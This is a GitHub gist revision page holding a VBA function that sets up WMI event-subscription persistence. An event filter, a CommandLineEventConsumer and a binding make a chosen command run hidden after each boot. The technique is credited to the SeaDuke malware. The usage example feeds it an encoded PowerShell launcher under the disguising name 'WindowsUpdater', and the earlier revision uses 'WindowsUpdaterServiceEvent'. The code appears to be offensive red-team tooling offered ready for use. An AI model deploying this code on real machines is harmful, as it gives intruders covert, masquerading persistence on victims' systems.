Last active
June 1, 2022 12:58
-
-
Save mgeeky/d00ba855d2af73fd8d7446df0f64c25a to your computer and use it in GitHub Desktop.
Revisions
-
mgeeky revised this gist
Aug 23, 2017 . 1 changed file with 27 additions and 19 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,18 +1,33 @@ ' ' SYNOPSIS: ' WMI Persistence method as originally presented by SEADADDY malware ' (https://github.com/pan-unit42/iocs/blob/master/seaduke/decompiled.py#L887) ' and further documented by Matt Graeber. ' ' The scheduled command will be launched after roughly 3 minutes since system ' gets up. Also, even if the command shall spawn a window - it will not be visible, ' since the command will get invoked by WmiPrvSE.exe that's running in Session 0. ' ' USAGE: ' WMIPersistence("command to be launched", "taskName") ' ' EXAMPLE: ' WMIPersistence("powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQ[...]EUAWAA=", "WindowsUpdater") ' ' AUTHOR: ' Mariusz B. / mgeeky, '17 ' Public Function WMIPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean Dim filterName, consumerName As String Dim objLocator, objService1 Dim objInstances1, objInstances2, objInstances3 Dim newObj1, newObj2, newObj3 On Error GoTo Failed filterName = taskName & "Event" consumerName = taskName & "Consumer" Set objLocator = CreateObject("WbemScripting.SWbemLocator") Set objService1 = objLocator.ConnectServer(".", "root\subscription") @@ -21,7 +36,9 @@ Public Function WMIPersistence(ByVal exePath As String) As Boolean ' Step 1: Set WMI Instance of type Event Filter ' Set objInstances1 = objService1.Get("__EventFilter") ' The malware originally will kicks in after roughly 3 minutes since System gets up. ' One can modify this delay time by modifying the WHERE clausule of the below query. query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 " _ & "WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' " _ & "AND TargetInstance.SystemUpTime >= 200 AND " _ @@ -39,20 +56,15 @@ Public Function WMIPersistence(ByVal exePath As String) As Boolean ' Step 2: Set WMI instance of type: CommandLineEventConsumer ' Set objInstances2 = objService1.Get("CommandLineEventConsumer") Set newObj2 = objInstances2.Spawninstance_ newObj2.name = consumerName newObj2.CommandLineTemplate = exePath newObj2.Put_ ' ' Step 3: Set WMI instance of type: Filter To Consumer Binding ' Set objInstances3 = objService1.Get("__FilterToConsumerBinding") Set newObj3 = objInstances3.Spawninstance_ newObj3.Filter = "__EventFilter.Name=""" & filterName & """" newObj3.Consumer = "CommandLineEventConsumer.Name=""" & consumerName & """" @@ -62,8 +74,4 @@ Public Function WMIPersistence(ByVal exePath As String) As Boolean Exit Function Failed: WMIPersistence = False End Function -
Aug 23, 2017 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,69 @@ Public Function WMIPersistence(ByVal exePath As String) As Boolean Dim filterName, consumerName As String Dim objLocator, objService1 Dim objInstances1, objInstances2, objInstances3 Dim newObj1, newObj2, newObj3 On Error GoTo Failed ' ' Most important variable to set: ' Command to be executed upon restart (set via function parameter) ' exePath = "calc.exe test12 345" filterName = "WindowsUpdaterServiceEvent" consumerName = "WindowsUpdaterServiceConsumer" Set objLocator = CreateObject("WbemScripting.SWbemLocator") Set objService1 = objLocator.ConnectServer(".", "root\subscription") ' ' Step 1: Set WMI Instance of type Event Filter ' Set objInstances1 = objService1.Get("__EventFilter") query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 " _ & "WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' " _ & "AND TargetInstance.SystemUpTime >= 200 AND " _ & "TargetInstance.SystemUpTime < 320" ' New object of type __EventFilter Set newObj1 = objInstances1.Spawninstance_ newObj1.name = filterName newObj1.eventNamespace = "root\cimv2" newObj1.QueryLanguage = "WQL" newObj1.query = query newObj1.Put_ ' ' Step 2: Set WMI instance of type: CommandLineEventConsumer ' Set objInstances2 = objService1.Get("CommandLineEventConsumer") ' New object of type CommandLineEventConsumert Set newObj2 = objInstances2.Spawninstance_ newObj2.name = consumerName newObj2.CommandLineTemplate = exePath newObj2.Put_ ' ' Step 3: Set WMI instance of type: Filter To Consumer Binding ' Set objInstances3 = objService1.Get("__FilterToConsumerBinding") ' New object of type CommandLineEventConsumert Set newObj3 = objInstances3.Spawninstance_ newObj3.Filter = "__EventFilter.Name=""" & filterName & """" newObj3.Consumer = "CommandLineEventConsumer.Name=""" & consumerName & """" newObj3.Put_ WMIPersistence = True Exit Function Failed: WMIPersistence = False End Function Sub Test() WMIPersistence ("calc.exe") End Sub